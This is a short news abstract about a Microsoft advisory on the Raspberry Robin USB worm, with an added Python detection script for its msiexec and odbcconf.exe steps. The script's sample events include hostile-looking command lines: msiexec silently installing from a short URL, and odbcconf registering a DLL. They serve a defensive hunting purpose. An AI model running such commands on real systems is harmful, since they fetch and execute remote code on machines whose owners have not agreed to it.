A private threat intelligence advisory issued by Microsoft warns that hundreds of Windows networks are infected with the Raspberry Robin worm.
The worm is spread through infected USB devices. After the user inserts the USB device and clicks the malicious .LNK file, the worm launches an msiexec process and runs a malicious file located on the device.
The worm then uses a short URL to connect to a command-and-control server, potentially including QNAP NAS devices, and downloads and installs several malicious dynamic link libraries (DLLs).
The DLLs are executed using the legitimate Windows utility odbcconf.exe as the worm attempts to connect to Tor network nodes.
The actor behind Raspberry Robin has not yet taken advantage of any infected Windows networks, so the goal of the worm remains unknown.
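The chain described above (msiexec reaching out to a URL, then odbcconf.exe being pointed at a DLL) can be hunted for in process-creation telemetry. The following is an added example, not code from Microsoft or the article. It assumes events are already parsed into dictionaries with hypothetical `host`, `image` and `command_line` fields, and every sample command line, host name, domain and path in it is constructed.

```python
import re

# Heuristics for the two steps named in the abstract:
# msiexec given a URL, and odbcconf.exe given a DLL path.
URL_RE = re.compile(r"https?://[^\s\"']+", re.IGNORECASE)
DLL_RE = re.compile(r"[^\s\"'{}]+\.dll\b", re.IGNORECASE)

def image_name(path):
    """Return the lower-cased executable name from a Windows path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()

def classify(event):
    """Return (rule, evidence) hits for one process-creation event."""
    image = image_name(event["image"])
    cmd = event["command_line"]
    hits = []
    if image == "msiexec.exe":
        m = URL_RE.search(cmd)
        if m:
            hits.append(("msiexec_remote_url", m.group(0)))
    elif image == "odbcconf.exe":
        m = DLL_RE.search(cmd)
        if m:
            hits.append(("odbcconf_dll_load", m.group(0)))
    return hits

def scan(events):
    """Group hits per host; both rules on one host matches the described chain."""
    per_host = {}
    for ev in events:
        for rule, evidence in classify(ev):
            per_host.setdefault(ev["host"], {})[rule] = evidence
    return {h: {"hits": r, "full_chain": len(r) == 2} for h, r in per_host.items()}

# Constructed sample events; not taken from the advisory.
SAMPLE_EVENTS = [
    {"host": "WS-01", "image": r"C:\Windows\System32\msiexec.exe",
     "command_line": r'msiexec.exe /q /i "http://short.example/AbC123"'},
    {"host": "WS-01", "image": r"C:\Windows\System32\odbcconf.exe",
     "command_line": r"odbcconf.exe /s /a {REGSVR C:\Users\Public\sample.dll}"},
    {"host": "WS-02", "image": r"C:\Windows\System32\msiexec.exe",
     "command_line": r"msiexec.exe /i C:\Installers\app.msi /qn"},
    {"host": "WS-03", "image": r"C:\Windows\System32\msiexec.exe",
     "command_line": r"msiexec.exe /q /i https://short.example/xyz"},
]

if __name__ == "__main__":
    for host, result in sorted(scan(SAMPLE_EVENTS).items()):
        print(host, result)
```

Either rule can fire on legitimate administration, so a single hit is a lead to triage, while both on the same host is the stronger signal.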
From PC Magazine
Abstracts Copyright © 2022 SmithBucklin, Washington, DC, USA